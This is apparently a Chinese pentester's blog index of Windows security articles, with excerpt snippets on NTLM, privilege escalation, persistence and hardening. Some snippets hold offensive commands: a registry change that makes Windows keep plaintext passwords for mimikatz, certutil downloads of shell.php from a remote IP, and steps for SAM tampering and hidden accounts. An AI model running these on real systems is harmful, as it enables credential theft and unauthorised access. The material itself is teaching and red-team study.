谢公子
《域渗透攻防指南》作者,国内知名攻防渗透专家。一个小帅哥,热爱技术,追求完美,有追求!擅长渗透测试、红蓝对抗、内网渗透、域渗透、云安全。
展开
-
Windows系统安全学习手册
Windows本地认证和NTLM认证 Windows渗透基础大全 Windows Server系统加固 Windows中的用户和组 利用DCOM执行系统命令 WindowsServer2012R2安装Exchange Server2016 Windows修改注册表实现自启动 Windows权限维持 远程连接Windows系统 Windows中获取用户密码 Windows目录介绍 psexec工具使用浅析(admin$) PowerShell使用浅析 Windows提权总结 WMI原创 2020-08-09 23:37:24 · 3133 阅读 · 2 评论 -
Windows本地认证和NTLM认证
目录Windows认证方式Windows本地认证NTLM认证方式(工作组环境中)wiresharek抓包NTLMv2,使用Hashcat爆破NTLM认证方式(域环境中)Kerberos认证方式认证的应用哈希传递攻击(PtH)票据传递攻击(PtT)在这之前,我们先了解几个基本的概念SSPI (Security Service Provider Interf...原创 2019-01-12 20:29:51 · 8318 阅读 · 0 评论 -
Windows渗透基础大全
目录Windows发展历史Windows中常见的目录Windows常见的cmd命令Windows中cmd窗口的文件下载(bitsadmin、certutil、iwr)Windows中加载并执行PowerShell脚本本地加载并执行PowerShell脚本远程下载并执行PowerShell脚本Windows中的批处理文件Windows中快捷键操作Window...原创 2018-10-16 09:57:51 · 7309 阅读 · 1 评论 -
Windows Server系统加固
目录账户管理、认证授权管理账户管理口令授权审核策略IP协议安全配置设备其他配置操作账户管理、认证授权管理账户说明:对于管理员账号,要求更改缺省账户名称,并且禁用 guest (来宾) 账号; 按照用户分配账户,根据系统要求,设定不同的账户和账户组,管理员用户,数据库用户,审计用户,来宾用户等 删除或锁定与设备运行、维护等工作无关的账户操作:开始...原创 2018-10-26 15:07:27 · 4853 阅读 · 0 评论 -
Windows中的用户和组
目录用户帐户Windows 默认账户Windows内置用户账户查看、创建和删除账户组账户内置组账户组的查看、创建和删除用户帐户用户帐户是对计算机用户身份的标识,本地用户帐户、密码存在本地计算机上,只对本机有效,存储在本地安全帐户数据库 SAM 中,文件路径:C:\Windows\System32\config\SAM ,对应的进程:lsass.exe。通过...原创 2019-12-04 11:02:47 · 13585 阅读 · 6 评论 -
RDP时提示CredSSP加密问题
RDP时提示CredSSP加密问题原创 2022-09-19 10:16:23 · 1596 阅读 · 0 评论 -
PC机器开启多用户RDP登录
Windows PC机器开启多用户RDP原创 2022-09-19 10:14:22 · 1886 阅读 · 0 评论 -
Guest用户如何切换到administrator用户桌面
先以guest用户RDP登录,管理员权限打开 regeditHKEY_LOCAL_MACHINE——>SAM——>SAM——>权限HKEY_LOCAL_MACHINE——>SAM——>SAM——>Domains——>Account——>Users——>000001F4 ,名称F ——>修改二进制数据(B)右键全选,然后复制然后查看HKEY_LOCAL_MACHINE——>SAM——>SAM——&g原创 2021-04-20 21:53:13 · 9544 阅读 · 0 评论 -
使用Hash远程RDP登录
我们知道在Windows Server2012及其以后的版本中,使用mimikatz在内存中抓取不到明文密码了,这是微软为了防止内存中泄露明文密码做的一个安全措施。但是修改注册表后重启依然可以抓取到明文密码,执行如下命令,等待目标机器重启后使用mimikatz即可抓取到明文密码reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d原创 2021-04-20 21:23:45 · 4311 阅读 · 0 评论 -
certutil工具的用法
certutilcertutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。远程下载certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下 certutil -urlcache -split -f http://114.118.80.138/shell.php c原创 2021-03-23 00:37:08 · 7448 阅读 · 3 评论 -
浅析Windows命名管道Named Pipe
管道 讲命令管道之前先来讲下管道。管道并不是什么新鲜事物,它是一项古老的技术,可以在很多操作系统(Unix、Linux、Windows 等)中找到,其本质是是用于进程间通信的共享内存区域,确切的说应该是线程间的通信方法(IPC)。 管道是一个有两端的对象。一个进程向管道写入信息,而另外一个进程从管道读取信息。进程可以从这个对象的一个端口写数据,从另一个端口读数据。创建管道的进程称为管道服务器(Pipe Server),而连接到这个管道的进程称为管道客户端(Pipe Clien...转载 2021-01-06 16:33:44 · 13324 阅读 · 0 评论 -
PowerShell学习之Provider提供程序
Provider提供程序在PowerShell中,对于文件系统,如 c:\abc、d:\abc,我们可以通过Get-ItemProperty,Get-Item, Get-ChildItem等命令访问。访问注册表,证书存储,环境变量,函数,WSMan其实都可以像访问文件系统一样,使用Get-ItemProperty,Get-Item, Get-ChildItem等命令访问。这一切都得益于,PowerShell为这些资源注册了一个Provider(中文翻译为:提供程序) 。Provider提供的是数据,提供原创 2021-01-08 10:40:30 · 1439 阅读 · 0 评论 -
使用reg管理注册表
目录注册表注册表结构reg增删改查注册表Windows注册表就相当于Windows系统的数据库,系统和软件的配置信息放在注册表里面。如果注册表出现了问题,可能导致系统崩溃。我们平时是使用regedit.exe命令来使用图形化界面管理注册表的。而在很多时候,使用图形化界面管理注册表很麻烦。所以今天介绍一种使用纯命令行的工具(reg.exe)来管理注册表。使用 reg.exe 可以对注册表进行添加、删除、修改、查看等操作。注册表结构注册表有四个关键术语:键、值、...原创 2021-01-04 15:56:31 · 1335 阅读 · 1 评论 -
Powershell学习之帮助系统
目录PowerShell的帮助系统使用帮助系统查找命令使用帮助系统查看指定命令的详细用法PowerShell的帮助系统可以输入 Get-help 、help或man来查看帮助系统。help 是对 Get-help 进行封装的函数,而 man 是 help 的别名。Get-help和help的区别在于,help可以以分页的形式阅读输出,而Get-help则是一次性把所有输出都显示出来。powershell的帮助文档是可以经常更新的。我们可以使用命令:update-help来更新...原创 2021-01-04 10:37:11 · 1199 阅读 · 0 评论 -
RDP登录相关
在红蓝对抗中,不管是红队还是蓝队,都需要对RDP远程桌面的知识具有很深的了解。RDP开放端口RDP默认端口为3389,但是,在很多情况下,运维人员会将RDP端口修改为其他端口。那么,我们就需要知道RDP修改后的真正端口了。可以通过执行以下命令查询tasklist /svc | findstr TermService #查找RDP进程的PIDnetstat -ano | findstr 上一步查询到的PID #过滤上一步的PID,查找出对应的端口也可以使用RegRdpPor原创 2020-12-14 23:07:04 · 1752 阅读 · 0 评论 -
解除445端口的占用
有很多时候,我们测试的时候,会需要用到445端口。而windows默认该端口是开放的,那么我们如何关闭该端口的占用状态呢?不是通过防火墙阻止445端口的连接来关闭,这种是阻止外部连接,但是本地445端口还是开放的。我们这里讲的是关闭占用445端口的服务!关闭Server服务打开cmd,执行:services.msc打开服务窗口然后重启机器就可以看到445端口已经没有占用了。...原创 2020-10-18 22:35:39 · 4333 阅读 · 1 评论 -
ACL(Access Control List)访问控制列表
ACL访问控制列表ACL(Access Control List)是Windows环境中访问控制模型的重点,用来表示用户(组)权限的列表。ACL微软官方文档:https://docs.microsoft.com/en-us/windows/desktop/SecAuthZ/access-control-lists简单来说,访问控制是指某主体(subject)允许或不被允许对某实体(object)执行读取、写入、删除、更改等操作。在Windows中,subject通常是进程,object是指安全对原创 2020-10-12 11:06:44 · 2629 阅读 · 0 评论 -
WindowsServer2008R2安装Exchange Server2010
首先,Windows Server2008R2需要加入域环境中,我这里Windows Server 2008R2就是域控,在域控上安装Exchange服务。以管理员权限打开PowerShell,执行以下命令import-Module ServerManagerAdd-WindowsFeature NET-Framework,RSAT-ADDS,Web-Server,Web-Basic-Auth,Web-Windows-Auth,Web-Metabase,Web-Net-Ext,Web-Lgcy原创 2020-10-08 20:54:13 · 2144 阅读 · 0 评论 -
WinRM远程管理工具的使用
WinRMWinRM是WindowsRemoteManagementd(windows远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。使用WinRM我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win...原创 2020-03-28 21:31:32 · 4574 阅读 · 0 评论 -
利用DCOM执行系统命令
目录DCOM本地DCOM执行命令获取DCOM程序列表使用DCOM执行任意系统命令使用DCOM在远程机器上执行任意系统命令1:调用MMC20Application远程执行命令2:调用9BA05972-F6A8-11CF-A442-00A0C90A8F39远程执行命令3:调用C08AFD90-F2A1-11D1-8455-00A0C91F3880远程执行命令DCOM...原创 2020-03-29 22:56:21 · 2733 阅读 · 1 评论 -
WindowsServer2012R2安装Exchange Server2016
先去下载Exchange Server2013,地址:Exchange Server 2013 (x64) - DVD (Multilanguage)原创 2020-07-26 22:42:01 · 3290 阅读 · 0 评论 -
Windows权限维持
目录创建隐蔽账号进程迁移启动目录横向渗透在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。比如采取以下几点措施:查杀木马进程 重启主机 断网 关闭主机而对于我们维持权限,可以有以下几点:创建隐蔽账号如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。或者读取该主机administrator账号密码,使用原创 2020-05-28 22:21:05 · 2265 阅读 · 0 评论 -
远程连接Windows系统
而在远程连接时,关于域管理员账号和 Administrator 账号的一些区别,涉及到 LocalAccountTokenFilterPolicy 值。在 Windows Vista 以后的操作系统中,LocalAccountTokenFilterPolicy 的默认值为0,这种情况下内置账户Administrator 进行远程连接时会直接得到具有管理员凭证的令牌,而非 Administrat...原创 2020-04-06 20:07:04 · 1640 阅读 · 0 评论 -
Windows中获取用户密码
目录Windows中对用户密码的处理LM-hashNTLM-hash复制SAM文件抓取明文密码或密码Hash使用mimikatz 抓取内存中的密码使用mimikatz读取域控上所有域用户的Hash值使用PowerShell命令抓取内存中的密码PwDump7抓取密码HashQuarksPwDump抓取密码Hash通过SAM和System文件读取密码Has...原创 2020-02-05 11:14:07 · 5560 阅读 · 0 评论 -
Windows目录介绍
日志域日志位置#服务器登录日志 登录事件ID 4624,可判别出登录域控制器的机器C:\Windows\System32\winevt\Logs\Security.evtx #远程登录日志c:\windows\system32\winevt\logs\*.remote* 主机远程登录日志HKCU\Software\Microsoft\Terminal Server Cli...原创 2020-01-14 09:32:46 · 2541 阅读 · 0 评论 -
PowerShell使用浅析
目录Windows PowerShellPowerShell的执行策略绕过执行策略执行PowerShell脚本PowerShell的常用文件类命令PowerShell远程下载文件并执行渗透测试常用的PowerShell命令Powershell导入文件Windows PowerShellWindows PowerShell是一种命令行外壳程序和脚本环境,它内置在...原创 2019-11-12 08:39:59 · 3094 阅读 · 1 评论 -
Windows提权总结
目录系统溢出漏洞提权本地溢出提权实战MSF中CVE-2018-8120模块本地溢出漏洞提权数据库提权MySQL提权SQL Server提权第三方软件提权FTP提权实战假冒令牌(token)提权(域环境中)BypassUAC提权我们获得了一个Windows系统的普通用户权限,由于低权限用户的很多操作将受到限制。所以,我们会想法设法地将低权限用户提权到高权...原创 2020-02-21 22:37:25 · 8786 阅读 · 0 评论 -
WMIC使用浅析
目录WMICWMIC在渗透中常用命令常用的WMIC命令进程管理账号管理共享管理服务管理目录管理计划任务wmiexec.pywmiexec.vbsInvoke-WmiCommand.ps1Invoke-WMIMethod使用以下的wmic工具远程连接目标机器执行命令,需要目标机器开启admin$共享。WMICWMIC是Windows M...原创 2020-01-14 09:33:43 · 1931 阅读 · 0 评论 -
工作组和域的区别
目录工作组工作组的加入和退出工作组的访问工作组的优缺点域域控DC(Domain Control)活动目录AD(Active Directory)DNS域名服务器域结构单域域树域林域信任关系域的原理工作组工作组是局域网中的一个概念,它是最常见的资源管理模式,简单是因为默认情况下计算机都是采用工作组方式进行资源管理的。将不同的电脑按功能分...原创 2018-10-22 15:42:42 · 9587 阅读 · 0 评论 -
135、137、138、139和445端口
目录TCP135端口UDP137、138端口TCP139、445端口首先,这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。比如2017年危害全球的永恒之蓝,就是利用的445端口。首先我们来了解一些基础知识:SMB:(ServerMessageBlock)Windows协议族,用于文件共享、打印共享的服务 NBT:(NetBIO...原创 2018-10-22 22:53:43 · 53244 阅读 · 1 评论 -
IPC$共享和其他共享(C$、D$、Admin$)
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?dir命令(查看文件和目录)tasklist命令(查看进程)at命令(计划命令,可反弹shell)schtasks(计划任务)关闭IPC$共享及其他共享...原创 2018-10-18 19:51:14 · 13641 阅读 · 0 评论 -
Windows中的共享文件和文件服务器
目录共享文件的设置默认共享关闭默认共享关闭共享服务共享文件夹权限文件服务器资源管理器的搭建文件共享是指主动地在网络上共享自己的计算机文件。一般文件共享使用P2P模式,文件本身存在用户本人的个人电脑上。大多数参加文件共享的人也同时下载其他用户提供的共享文件。有时这两个行动是连在一起的。在很早期的Windows中(Windows2000以下),文件共享服务是利用TCP的1...原创 2018-10-17 11:59:02 · 18664 阅读 · 1 评论 -
Windows 2003 Server远程代码执行漏洞集合
目录MS08-067CVE-2017-7269MS08-067发布日期:2008/10/22 针对端口:139、445 漏洞等级:高危 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导...原创 2019-01-14 19:35:30 · 6167 阅读 · 0 评论 -
Windows Server中企业证书服务的安装
目录企业证书服务的安装证书服务的应用企业证书服务的安装企业证书服务是基于域的,所以需要该服务器是域控服务器。添加角色,勾选 Active Directory证书服务然后后面的一直下一步,然后安装即可验证是否安装成功:访问页面: http://127.0.0.1/certsrv ,出现下面页面说明安装成功证书服务的应用申请证书...原创 2018-11-23 18:59:16 · 2038 阅读 · 0 评论 -
Windows中动态磁盘管理
目录动态磁盘基本磁盘和动态磁盘的转换简单卷跨区卷带区卷镜像卷RAID-5卷相关文章:硬盘分区形式(MBR、GPT)、系统引导、文件系统、Inode和Block动态磁盘Windows 2000起引入了基本磁盘和动态磁盘的概念,并且把它们添加到Windows系统管理员的工具之中。无论是基本磁盘还是动态磁盘,你都可以使用任何文件系统,包括FAT和NTFS。而且...原创 2018-10-17 22:29:47 · 4419 阅读 · 0 评论 -
硬盘分区形式(MBR、GPT)、系统引导、文件系统、Inode和Block
目录MBR和GPTMBR的局限性GPT的优势主分区、扩展分区和逻辑分区挂接卷Legacy、UEFI引导和GRUB引导文件系统(FAT16、32、NTFS和EXT2、3、4、Xfs、Tmpfs)Windows中的文件系统Linux中的文件系统inode block superblockMBR和GPT新买一块硬盘,设置分区时,系统会询问你是想要使用MBR...原创 2018-08-28 19:31:06 · 36326 阅读 · 0 评论 -
IIS7.5配置对PHP的支持
以下环境是 Windowsserver2008R2 IIS7.5一般情况下,windowsserver系统默认是仅支持IIS+asp 或 IIS+aspx 的 搭配的,但是有时候我们的网站程序是php的。所以,我们就需要配置 IIS 对 PHP 的支持。怎么安装 IIS 的话,我不说了,今天主要讲怎么配置 IIS 对PHP的支持。我们首先需要下载PHP的压缩包,这里我们用的是p...原创 2018-11-15 11:29:38 · 6299 阅读 · 1 评论 -
Windows各版本以及漏洞
目录MS-DosWin9XWinNTWindows Server.NET FrameWorkPowerShellIIS6.0漏洞 解析漏洞IIS7.0/7.5漏洞 畸形解析漏洞MS-Dos版本号 发布时间 Windows1.0 1985.11 Windows2.0 1987.12 Windows2.1 ...原创 2018-10-27 10:37:30 · 3199 阅读 · 0 评论 -
Windows本地安全策略
目录本地安全策略密码策略账户策略审核策略用户权限分配安全选项本地安全策略安全策略是影响计算机安全性的安全设置的组合。可以利用本地安全策略来编辑本地计算机上的帐户系统安全策略包括下面的设置:配置帐户策略 配置审核策略 配置用户权限 配置安全选项开始-->管理工具-->本地安全策略密码策略密码策略强制服务器上的用户帐户设置的密码满...原创 2018-10-17 17:29:55 · 13761 阅读 · 3 评论 -
Windows中的权限设置、文件压缩、文件加密、磁盘配额和卷影副本
目录权限设置文件夹的NTFS权限文件的NTFS权限NTFS权限的应用规则文件压缩文件加密磁盘配额卷影副本权限设置的应用遇到的一个权限问题的小bug权限问题的实际应用权限设置NTFS文章:FAT32和NTFS在Windows中,NTFS文件系统可以设置文件和目录的权限。存储在 NTFS 分区上的文件和文件夹对用户的访问有安全控制,可以控制用户访...原创 2018-10-16 12:07:05 · 2803 阅读 · 0 评论